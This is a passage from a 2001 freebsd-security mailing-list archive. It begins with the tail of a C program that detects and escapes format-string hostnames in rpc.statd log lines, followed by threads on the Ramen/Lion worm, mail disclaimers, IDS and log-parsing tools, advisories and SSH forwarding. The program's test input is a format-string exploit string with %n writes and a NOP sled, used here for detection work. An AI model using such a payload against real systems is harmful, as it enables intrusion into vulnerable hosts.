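        "\x18\xf7\xff\xbf\x18\xf7\xff\xbf"
        "%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n"
        "\x90\x90\x90\x90\x90\x90\x90\x90";
    static const unsigned char junk[] = "\x01\x02host";
    char esc[1024];

    printf("%-14s %s\n", names[classify_hostname(good, sizeof good - 1)], (const char *)good);
    escape_for_log(fmt, sizeof fmt - 1, esc, sizeof esc);
    printf("%-14s %s\n", names[classify_hostname(fmt, sizeof fmt - 1)], esc);
    escape_for_log(junk, sizeof junk - 1, esc, sizeof esc);
    printf("%-14s %s\n", names[classify_hostname(junk, sizeof junk - 1)], esc);
    return 0;
}
```

The classifier is also usable as detection logic over the log lines themselves: a line from rpc.statd whose "invalid hostname" field yields NAME_FORMAT_STRING is the signature Mike's snort rules key on, independent of whether the 0x90 bytes after it are a NOP sled or filler.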
From owner-freebsd-security Mon Jun 4 8:14:25 2001
Date: Mon, 4 Jun 2001 10:14:20 -0500 (EST)
From: Mike Squires
To: Josh Thomas
Cc: freebsd-security@freebsd.org
Subject: Re: rpc.statd attack before ipfw activated
Message-Id: <200106041514.f54FEKL18615@ct980320-b.blmngtn1.in.home.com>
In-Reply-To: "from Josh Thomas at Jun 4, 2001 01:30:42 am"

I think this is the LINUX Ramen/Lion/Adore worm in action. The NOPs are always
preceded by a check for rpc.statd services. snort will detect these. I use
snortsnarf with snort; snortsnarf gives you Web lookups for the attacks.

4.3-STABLE isn't vulnerable, as far as I know.

MLS
From owner-freebsd-security Mon Jun 4 12:42:23 2001
Date: Mon, 4 Jun 2001 12:42:20 -0700 (PDT)
From: Arnim Sauerbier
To: "Karsten W. Rohrbach"
Cc: security@freebsd.org
Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd)
Message-ID: <20010604194220.93548.qmail@web11807.mail.yahoo.com>
In-Reply-To: <20010601202813.H10477@mail.webmonster.de>

> ooh. i forgot. wasn't this sent to a mailing list? *grin*
> i hope nobody sues me for replying to it in public... nevermind ;-)

Karsten, I couldn't agree more.

Is the world so lawyer-infested that we need to blat such ugly .sigs (below)
to everything we write? I wonder what legal scars a person carries to make
him/her feel the need for such disclaimers. I feel like I'm reading the text
of a dog that's been beaten with a legal stick.

I'm seeing more and more of this in private emails, and it just puts a sick,
sad feeling in my stomach. What happened to the people who understand that
"information wants to be free"?

Sorry to not post anything more constructive. Just venting. Thanks to all the
smart folks here for the SSH/PKI education (and humblification, I'm still
digesting it).

You can copy and distribute this message in any way you want. There, I said
it. I feel better.

arnim

> > The information contained in this e-mail message is confidential,
> > intended only for the use of the individual or entity named above. If
> > the reader of this e-mail is not the intended recipient, or the employee
> > or agent responsible to deliver it to the intended recipient, you are
> > hereby notified that any review, dissemination, distribution or copying
> > of this communication is strictly prohibited. If you have received this
> > e-mail in error, please contact postmaster@globalstar.com

=====
    _\\\/   __ _                                  = ..'
  Arnim Sauerbier,   /_/ (_)__ __ ____ __      C \)
  ugly sack of       /_/__/_/ _ \/_//_/|_\/_/   ...
  the choice of \  - mostly water /____/_/_//_/\_,_//_/\_|  a GNU generation
From: Rob Simmons
To: Arnim Sauerbier
Cc: "Karsten W. Rohrbach" , security@FreeBSD.ORG
Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd)
In-Reply-To: <20010604194220.93548.qmail@web11807.mail.yahoo.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

Maybe add an X-Copyright: line to your header. Less messy with the same
effect? IANAL

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Mon, 4 Jun 2001, Arnim Sauerbier wrote:

> > ooh. i forgot. wasn't this sent to a mailing list? *grin*
> > i hope nobody sues me for replying to it in public... nevermind ;-)
>
> Karsten, I couldn't agree more.
>
> Is the world so lawyer-infested that we need to blat such ugly .sigs (below) to everything we
> write? I wonder what legal scars a person carries to make him/her feel the need for such
> disclaimers. I feel like I'm reading the text of a dog that's been beaten with a legal stick.
>
> I'm seeing more and more of this in private emails, and it just puts a sick, sad feeling in my
> stomach. What happened to the people who understand that "information wants to be free"?
>
> Sorry to not post anything more constructive. Just venting. Thanks to all the smart folks here
> for the SSH/PKI education (and humblification, I'm still digesting it).
>
> You can copy and distribute this message in any way you want. There, I said it. I feel better.
>
> arnim
>
> > > The information contained in this e-mail message is confidential,
> > > intended only for the use of the individual or entity named above. If
> > > the reader of this e-mail is not the intended recipient, or the employee
> > > or agent responsible to deliver it to the intended recipient, you are
> > > hereby notified that any review, dissemination, distribution or copying
> > > of this communication is strictly prohibited. If you have received this
> > > e-mail in error, please contact postmaster@globalstar.com
> >
>
> =====
> _\\\/ __ _
> = ..' Arnim Sauerbier, /_/ (_)__ __ ____ __
> C \) ugly sack of /_/__/_/ _ \/_//_/|_\/_/ ... the choice of
> \ - mostly water /____/_/_//_/\_,_//_/\_| a GNU generation
>
> __________________________________________________
> Do You Yahoo!?
> Get personalized email addresses from Yahoo! Mail - only $35
> a year! http://personal.mail.yahoo.com/
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.5 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7G+jEv8Bofna59hYRA/HmAKCPSuETIN/SX4yQjM6fryqgQTQW1wCgmehm
i/vfGP06xshuoZyxUJu8Ixw=
=8DKl
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jun 4 13: 3:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from poontang.schulte.org (poontang.schulte.org [209.134.156.197]) by hub.freebsd.org (Postfix) with ESMTP id 5EEFE37B406 for ; Mon, 4 Jun 2001 13:03:08 -0700 (PDT) (envelope-from christopher@schulte.org)
Received: from schulte-laptop.schulte.org (nb40.netbriefings.com [64.183.199.40]) by poontang.schulte.org (8.12.0.Beta7/8.12.0.Beta7) with ESMTP id f54K2rab060183; Mon, 4 Jun 2001 15:02:54 -0500 (CDT)
Message-Id: <5.1.0.14.0.20010604145906.026902f8@pop.schulte.org>
X-Sender: schulte@pop.schulte.org
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Mon, 04 Jun 2001 15:01:41 -0500
To: Rob Simmons , Arnim Sauerbier
From: Christopher Schulte
Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd)
Cc: "Karsten W. Rohrbach" , security@FreeBSD.ORG
In-Reply-To:
References: <20010604194220.93548.qmail@web11807.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed

At 04:00 PM 6/4/2001 -0400, Rob Simmons wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: RIPEMD160
>
>Maybe add an X-Copyright: line to your header. Less messy with the same
>effect? IANAL

Nope, many clients hide those types of headers by default. Is it the end
user's job to scour every header of every email? Unlikely.

>Robert Simmons
>Systems Administrator
>http://www.wlcg.com/

--chris

From owner-freebsd-security Mon Jun 4 13:17:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from NOC.maKintosh.com (maKintosh.com [208.188.197.97]) by hub.freebsd.org (Postfix) with ESMTP id 4427F37B401 for ; Mon, 4 Jun 2001 13:17:30 -0700 (PDT) (envelope-from co0kie@maKintosh.com)
Received: by NOC.maKintosh.com (Postfix, from userid 1005) id 7CCB3104B; Mon, 4 Jun 2001 15:12:45 -0500 (CDT)
Date: Mon, 4 Jun 2001 15:12:45 -0500
From: co0kie bawx
To: security@FreeBSD.ORG
Subject: Re: (Originially): Apache Software Foundation Server compromised, resecured.
Message-ID: <20010604151245.A15758@NOC.maKintosh.com>
References: <20010604194220.93548.qmail@web11807.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: ; from rsimmons@wlcg.com on Mon, Jun 04, 2001 at 04:00:00PM -0400

Speaking of messy.. Maybe change thread Subjects once the actual
(originating) subject changes. I wonder where people get the time to
worry about silly little things, like others' signatures and disclaimers.
<:

/co0kie

On Mon, Jun 04, 2001 at 04:00:00PM -0400, Rob Simmons wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: RIPEMD160
>
> Maybe add an X-Copyright: line to your header. Less messy with the same
> effect? IANAL

From owner-freebsd-security Mon Jun 4 14:55:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-64-165-226-243.dsl.lsan03.pacbell.net [64.165.226.243]) by hub.freebsd.org (Postfix) with ESMTP id 9BA6537B401 for ; Mon, 4 Jun 2001 14:55:40 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id D4511673A5; Mon, 4 Jun 2001 14:55:39 -0700 (PDT)
Date: Mon, 4 Jun 2001 14:55:39 -0700
From: Kris Kennaway
To: "Nickolay A. Kritsky"
Cc: security@FreeBSD.ORG
Subject: Re: FYI
Message-ID: <20010604145539.A72908@xor.obsecurity.org>
References: <056701c0ece9$0308d720$0600a8c0@ibmka.internethelp.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <056701c0ece9$0308d720$0600a8c0@ibmka.internethelp.ru>; from nkritsky@internethelp.ru on Mon, Jun 04, 2001 at 03:25:03PM +0400

On Mon, Jun 04, 2001 at 03:25:03PM +0400, Nickolay A. Kritsky wrote:
> Does it mean, that popper supplied with FreeBSD 3.3 (/usr/local/libexec/popper) is vulnerable too?

Erm, yes. I bet that's got other problems too for which we released
advisories a long time ago.

Kris

From owner-freebsd-security Mon Jun 4 15:37:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 59DB137B403 for ; Mon, 4 Jun 2001 15:37:39 -0700 (PDT) (envelope-from des@ofug.org)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id AAA75688; Tue, 5 Jun 2001 00:37:34 +0200 (CEST) (envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: Brian Behlendorf
Cc: "Karsten W. Rohrbach" ,
Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd)
References:
From: Dag-Erling Smorgrav
Date: 05 Jun 2001 00:37:33 +0200
In-Reply-To:
Message-ID:
Lines: 12
User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Brian Behlendorf writes:
> On 1 Jun 2001, Dag-Erling Smorgrav wrote:
> > Oh, and .252 does have reverse DNS:
> OK, but it wasn't recorded in my wtmp, so I suspect it might not get
> recorded in others'.

No, because it's too long, so the IP is recorded instead (to avoid
ambiguities)

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Tue Jun 5 1:24:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from Exchange2000.com-con.ag (exchange2000.com-con.net [212.6.164.8]) by hub.freebsd.org (Postfix) with ESMTP id D665537B401 for ; Tue, 5 Jun 2001 01:24:46 -0700 (PDT) (envelope-from rh@com-con.net)
Content-Class: urn:content-classes:message
Subject: security log file parser / ids
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Date: Tue, 5 Jun 2001 10:24:42 +0100
X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0
Message-ID:
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: security log file parser / ids
Thread-Index: AcDtoVoNIzbBRx6KQpGCdqF8vL9w9w==
From: "Heimes, Rene"
To:

hiho!

i am searching for a parser that parses security logs from ipfw-made up
logs. anyone got a hint?
(btw: what about ipfw firewalls - outdated? what would be better?
ipchains? help!)

other question - what's the (freeware) ids of your choice / "state of the
art" for freeBSD?

great thanks in advance,

rené

****************************************************
"who fights might lose - who does not fight has lost immediately"
Bertolt Brecht (freely adapted ;-)
****************************************************

From owner-freebsd-security Tue Jun 5 1:31: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id 1B57237B403 for ; Tue, 5 Jun 2001 01:30:55 -0700 (PDT) (envelope-from on@cs.ait.ac.th)
Received: from banyan.cs.ait.ac.th (on@banyan.cs.ait.ac.th [192.41.170.5]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f558m9B00684; Tue, 5 Jun 2001 15:48:09 +0700 (ICT)
Received: (from on@localhost) by banyan.cs.ait.ac.th (8.8.5/8.8.5) id PAA21823; Tue, 5 Jun 2001 15:30:48 +0700 (ICT)
Date: Tue, 5 Jun 2001 15:30:48 +0700 (ICT)
Message-Id: <200106050830.PAA21823@banyan.cs.ait.ac.th>
X-Authentication-Warning: banyan.cs.ait.ac.th: on set sender to on@banyan.cs.ait.ac.th using -f
From: Olivier Nicole
To: rh@com-con.net
Cc: freebsd-security@FreeBSD.ORG
In-reply-to: (rh@com-con.net)
Subject: Re: security log file parser / ids
References:

René,

>i am searching for a parser that parses security logs from ipfw-made up
>logs. anyone got a hint?

Do you mean output to syslog?

I'd suggest swatch
(http://www.cert.org/security-improvement/implementations/i042.01.html)
but did not test it myself (one of my many projects for when I have some
time, maybe next century :)

Regards,

olivier

From owner-freebsd-security Tue Jun 5 2:28:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (diskworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 35E2F37B405 for ; Tue, 5 Jun 2001 02:28:37 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 714 invoked by uid 1000); 5 Jun 2001 09:27:26 -0000
Date: Tue, 5 Jun 2001 12:27:26 +0300
From: Peter Pentchev
To: "Heimes, Rene"
Cc: freebsd-security@freebsd.org
Subject: Re: security log file parser / ids
Message-ID: <20010605122726.A665@ringworld.oblivion.bg>
Mail-Followup-To: "Heimes, Rene" , freebsd-security@freebsd.org
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from rh@com-con.net on Tue, Jun 05, 2001 at 10:24:42AM +0100

On Tue, Jun 05, 2001 at 10:24:42AM +0100, Heimes, Rene wrote:
> hiho!
>
> i am searching for a parser that parses security logs from ipfw-made up
> logs. anyone got a hint?
> (btw: what about ipfw firewalls - outdated? what would be better?
> ipchains? help!)

Is there any reason to consider ipfw outdated? Or are you just asking if
it is? In that case, IMHO, no, it isn't.

G'luck,
Peter

--
This sentence every third, but it still comprehensible.

From owner-freebsd-security Tue Jun 5 7:23:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from d170h113.resnet.uconn.edu (d170h113.resnet.uconn.edu [137.99.170.113]) by hub.freebsd.org (Postfix) with SMTP id 2DB0B37B401 for ; Tue, 5 Jun 2001 07:23:09 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net)
Received: (qmail 25963 invoked by alias); 5 Jun 2001 14:23:32 -0000
Received: from unknown (HELO moobert) (137.99.170.140) by d170h113.resnet.uconn.edu with SMTP; 5 Jun 2001 14:23:32 -0000
Message-ID: <003d01c0edcb$702fd1e0$8caa6389@resnet.uconn.edu>
From: "Peter C. Lai"
To:
References: <20010604194220.93548.qmail@web11807.mail.yahoo.com> <20010604151245.A15758@NOC.maKintosh.com>
Subject: Re: (Originially): Apache Software Foundation Server compromised, resecured.
Date: Tue, 5 Jun 2001 10:25:57 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200

The truth is that many companies and private organizations actually do
filter all mail not just for viruses but many do it for "non-work-related"
activities, because they feel that one shouldn't use company bandwidth to
send "personal" email. Recently I knew someone who received a company
reprimand about using email for personal use even though such a
"restriction" was not even in the company policy, and he was sending his
mails off company time.

Furthermore, we know that e-mail is probably less secure than even a phone
call or snail-mail (at least in the non-underground "normal" world). The
chance that a piece of suggestive email may fall "into the wrong hands" is
high. If you remember some incriminating cell phone call made by Newt
Gingrich that was intercepted by some layperson ended up as one of the
scandals of 1997 or something.

At the same time, because e-mail is a very effective asynchronous mode of
communication, it is easier to send private or confidential messages as
opposed to phone messages or fax. (e.g. You probably wouldn't want
confidential faxes floating around the office, and most offices have one
or two fax machines per department.)

The disclaimer at least offers a warning, if not actual defense against
unauthorized (mostly unintentional) activities. This is kind of like the
EULA on closed-source software, which most people blatantly ignore, but
it's still there and gives the SPA at least some authority in the matter.

Peter C. Lai | University of Connecticut peter.lai@uconn.edu Dept. of Residential Life | Programmer College of Liberal Arts & Sciences | Dept. of Molecular & Cell Biology | Undergraduate Research Assistant

----- Original Message -----
From: "co0kie bawx"
To:
Sent: Monday, June 04, 2001 4:12 PM
Subject: Re: (Originially): Apache Software Foundation Server compromised, resecured.

> Speaking of messy.. Maybe change thread Subjects once the actual
> (originating) subject changes. I wonder where people get the time to
> worry about silly little things, like others' signatures and disclaimers.
> <:
> /co0kie
>
> On Mon, Jun 04, 2001 at 04:00:00PM -0400, Rob Simmons wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: RIPEMD160
> >
> > Maybe add an X-Copyright: line to your header. Less messy with the same
> > effect? IANAL
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

From owner-freebsd-security Tue Jun 5 8:22:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.fdma.com (mail.fdma.com [216.241.67.73]) by hub.freebsd.org (Postfix) with ESMTP id 37F9937B401 for ; Tue, 5 Jun 2001 08:22:14 -0700 (PDT) (envelope-from scheidell@fdma.com)
Received: from MIKELT (mikelt.fdma.lan [10.1.1.40]) by mail.fdma.com (8.11.3/8.11.3) with SMTP id f55FM3P05600 for ; Tue, 5 Jun 2001 11:22:03 -0400 (EDT)
Message-ID: <007b01c0edd3$45ebaf50$2801010a@fdma.com>
From: "Michael Scheidell"
To:
References:
Subject: Re: security log file parser / ids
Date: Tue, 5 Jun 2001 11:22:02 -0400
Organization: Florida Datamation, Inc.
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200

""Heimes, Rene"" wrote in message
news:F54B610C5BFDE546BBA2F6CC595ACC75084958@Exchange2000.com-con.ag...
> hiho!
>
> i am searching for a parser that parses security logs from ipfw-made up
> logs. anyone got a hint?
> (btw: what about ipfw firewalls - outdated? what would be better?
> ipchains? help!)

Depends on what you want to do with it.

I do a 'tail -3 /var/log/ipfw.log' every morning, just to see anything
interesting.

I also use the perl agent for Mynetwatchman. It watches ipfw, cisco ios,
and specific stuff I pass it from tcpwrapper and sends it to
www.mynetwatchman.com (they autolart the isp on certain events, like
lion/cheeze worm scans, rpc scans, or if they detect the same scanning ip
from several different locations)

I then go to their site, select 'attacks reported today' and see if they
are just hitting my site, or it's a generic script scanner.

From owner-freebsd-security Tue Jun 5 8:27:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from c1456354-a.boise1.id.home.com (c1456354-a.boise1.id.home.com [65.4.107.53]) by hub.freebsd.org (Postfix) with SMTP id 5984737B405 for ; Tue, 5 Jun 2001 08:27:23 -0700 (PDT) (envelope-from g0rdi@c1456354-a.boise1.id.home.com)
Received: (qmail 995 invoked by uid 500); 5 Jun 2001 15:25:52 -0000
Date: Tue, 5 Jun 2001 09:25:52 -0600
From: jeremy-novak
To: "Heimes, Rene"
Cc: freebsd-security@freebsd.org
Subject: Re: security log file parser / ids
Message-ID: <20010605092552.A936@c1456354-a.boise1.id.home.com>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from rh@com-con.net on Tue, Jun 05, 2001 at 10:24:42AM +0100

On Tue, Jun 05, 2001 at 10:24:42AM +0100, Heimes, Rene wrote:
> hiho!
>
> i am searching for a parser that parses security logs from ipfw-made up
> logs. anyone got a hint?
> (btw: what about ipfw firewalls - outdated? what would be better?
> ipchains? help!)
>
> other question - what's the (freeware) ids of your choice / "state of the
> art" for freeBSD?
>
> great thanks in advance,
>
> rené
>
> ****************************************************
> "who fights might lose - who does not fight has lost immediately"
> Bertolt Brecht (freely adapted ;-)
> ****************************************************

Hi
I hope this helps some. It is a neat little toy called logcheck that is
very configurable. You can get it at http://www.psionic.com

Hope that helps out.
Jeremy
--
 ^ ^     email: pr0cy0n@home.com (but you already knew that)
[ 0 0 ]  ircnick: g0rdi
  , '    usenet/mail: comp.unix.bsd.freebsd.misc/freebsd-hackers, lots more
   o     root password: just kidding!
"You have an account at host.com"? "I wanna be user@host.com; I would get
so many 'cool' e-mails".

From owner-freebsd-security Tue Jun 5 10:45: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from f-control.area51.dk (f-control.area51.dk [213.237.108.10]) by hub.freebsd.org (Postfix) with SMTP id 2E00B37B406 for ; Tue, 5 Jun 2001 10:45:03 -0700 (PDT) (envelope-from a@f-control.area51.dk)
Received: (qmail 98421 invoked by uid 1007); 5 Jun 2001 17:45:14 -0000
Date: Tue, 5 Jun 2001 19:45:14 +0200
From: Alex Holst
To: freebsd-security@FreeBSD.ORG
Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd)
Message-ID: <20010605194514.B98233@area51.dk>
Mail-Followup-To: Alex Holst , freebsd-security@FreeBSD.ORG
References: <3B16E7D9.3E9B78FF@globalstar.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3B16E7D9.3E9B78FF@globalstar.com>; from crist.clark@globalstar.com on Thu, May 31, 2001 at 05:54:49PM -0700

Quoting Crist Clark (crist.clark@globalstar.com):
> You cannot 'record passphrases.' RSA authentication uses public key
> cryptography.

Exactly. However, consider the three machines in the scenario below:

workstation ---> compromised middle machine ---> server

I have been thinking about the least risk approach. If the middle machine
has ssh and sshd trojaned to various degrees, would one not benefit from
using authentication forwarding rather than typing one's passphrase to the
ssh client on the compromised machine?

If one does lose his passphrase and the trojaned ssh captured the response
it still wouldn't do an intruder much good, would it?

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow.
http://a.area51.dk/

From owner-freebsd-security Tue Jun 5 10:50: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from magnetar.blackhatnetworks.com (magnetar.blackhatnetworks.com [65.166.202.3]) by hub.freebsd.org (Postfix) with ESMTP id 0E62337B403 for ; Tue, 5 Jun 2001 10:50:04 -0700 (PDT) (envelope-from alex@bsdfreak.org)
Received: from localhost (alex@localhost.blackhatnetworks.com [127.0.0.1]) by magnetar.blackhatnetworks.com (8.x/8.x) with ESMTP id f55Hnwt20598; Tue, 5 Jun 2001 13:49:58 -0400 (EDT)
Date: Tue, 5 Jun 2001 13:49:58 -0400 (EDT)
From: Alex
X-X-Sender:
To: Alex Holst
Cc:
Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd)
In-Reply-To: <20010605194514.B98233@area51.dk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

> Quoting Crist Clark (crist.clark@globalstar.com):
> > You cannot 'record passphrases.' RSA authentication uses public key
> > cryptography.
>
> Exactly. However, consider the three machines in the scenario below:
>
> workstation ---> compromised middle machine ---> server
>
> I have been thinking about the least risk approach. If the middle machine
> has ssh and sshd trojaned to various degrees, would one not benefit from
> using authentication forwarding rather than typing one's passphrase to the
> ssh client on the compromised machine?

This is a perfect scenario for the attacker to perform a man-in-the-middle
attack, passive SSH analysis, or a brute force attempt at the cryptographic
integrity of the connection.

-Alex

>
> If one does lose his passphrase and the trojaned ssh captured the response
> it still wouldn't do an intruder much good, would it?
>
> --
> I prefer the dark of the night, after midnight and before four-thirty,
> when it's more bare, more hollow.
> http://a.area51.dk/
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

From owner-freebsd-security Tue Jun 5 12: 4: 3 2001
Delivered-To: freebsd-security@freebsd.org
Received: from poontang.schulte.org (poontang.schulte.org [209.134.156.197]) by hub.freebsd.org (Postfix) with ESMTP id 2929537B401 for ; Tue, 5 Jun 2001 12:04:01 -0700 (PDT) (envelope-from christopher@schulte.org)
Received: from schulte-laptop.schulte.org (nb40.netbriefings.com [64.183.199.40]) by poontang.schulte.org (8.12.0.Beta7/8.12.0.Beta7) with ESMTP id f55J3wab009352 for ; Tue, 5 Jun 2001 14:03:59 -0500 (CDT)
Message-Id: <5.1.0.14.0.20010605135437.0278eeb0@pop.schulte.org>
X-Sender: schulte@pop.schulte.org
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 05 Jun 2001 14:02:45 -0500
To: security@FreeBSD.ORG
From: Christopher Schulte
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts
In-Reply-To: <200106051808.f55I8ik15444@freefall.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed

At 11:08 AM 6/5/2001 -0700, you wrote:
>This patch has been verified to apply to FreeBSD 4.3-RELEASE and
>4.2-RELEASE; it may or may not apply to older, unsupported versions of
>FreeBSD.

Can someone comment on the impact of applying this patch to a 4.2-STABLE
environment? One might assume since 4.2-S falls between 4.2-R and 4.3-R,
it would work?

FreeBSD 4.2-STABLE FreeBSD 4.2-STABLE #1: Sat Jan 6 19:43:53 CST 2001

Thanks,

--chris

From owner-freebsd-security Tue Jun 5 13: 6:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mta5.rcsntx.swbell.net (mta5.rcsntx.swbell.net [151.164.30.29]) by hub.freebsd.org (Postfix) with ESMTP id C73B937B401 for ; Tue, 5 Jun 2001 13:06:38 -0700 (PDT) (envelope-from ryanpek@swbell.net)
Received: from mhx800 ([64.219.216.69]) by mta5.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GEH00IID0BS9E@mta5.rcsntx.swbell.net> for freebsd-security@freebsd.org; Tue, 5 Jun 2001 13:50:16 -0500 (CDT)
Date: Tue, 05 Jun 2001 13:50:08 -0500
From: Ryan
Subject: Re: security log file parser / ids
To: "Heimes, Rene" , freebsd-security@freebsd.org
Message-id: <001301c0edf0$58b49ee0$01000001@mhx800>
MIME-version: 1.0
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 8BIT
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
References:
X-Priority: 3

You could always use ipnat and IPF with ipmon; it works very well, giving
log output to syslog like:

04/06/2001 21:34:37.297183 xl0 @0:23 b 195.112.227.10 -> 64.219.216.68 PR icmp len 20 56 icmp 3/1 for 64.219.216.68,113 - 195.112.240.61,51518 PR tcp len 20 40 IN

ipf howto: http://www.obfuscation.org/ipf/

----- Original Message -----
From: "Heimes, Rene"
To:
Sent: Tuesday, June 05, 2001 4:24 AM
Subject: security log file parser / ids

hiho!

i am searching for a parser that parses security logs from ipfw-made up
logs. anyone got a hint?
(btw: what about ipfw firewalls - outdated? what would be better?
ipchains? help!)

other question - what's the (freeware) ids of your choice / "state of the
art" for freeBSD?

great thanks in advance,

rené

****************************************************
"who fights might lose - who does not fight has lost immediately"
Bertolt Brecht (freely adapted ;-)
****************************************************

From owner-freebsd-security Tue Jun 5 14:55: 3 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ariel.phys.wesleyan.edu (ariel.phys.wesleyan.edu [129.133.71.143]) by hub.freebsd.org (Postfix) with ESMTP id 301EA37B401 for ; Tue, 5 Jun 2001 14:54:58 -0700 (PDT) (envelope-from vlad@ariel.phys.wesleyan.edu)
Received: by ariel.phys.wesleyan.edu (Postfix, from userid 1001) id 8B3A51EA30C; Tue, 5 Jun 2001 17:55:03 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1]) by ariel.phys.wesleyan.edu (Postfix) with ESMTP id 88C391E650C; Tue, 5 Jun 2001 17:55:03 -0400 (EDT)
Date: Tue, 5 Jun 2001 17:55:03 -0400 (EDT)
From: Vladimir Savichev
To:
Cc:
Subject: Re: rpc.statd attack before ipfw activated
Message-ID: <20010605174214.J90423-100000@ariel.phys.wesleyan.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

how interesting. I'm here on

FreeBSD ariel.phys.wesleyan.edu 4.3-STABLE FreeBSD 4.3-STABLE #2: Sun Jun 3 21:23:38 EDT 2001 root@ariel.phys.wesleyan.edu:/usr/obj/usr/src/sys/ARIEL i386

I got a pretty much similar log several times for the last couple of
days, was wondering what the hell rpc is doing. Could you point me where
I can read more about it? How can I log call hosts?

--Vlad

From owner-freebsd-security Tue Jun 5 15:12:56 2001
Delivered-To: freebsd-security@freebsd.org
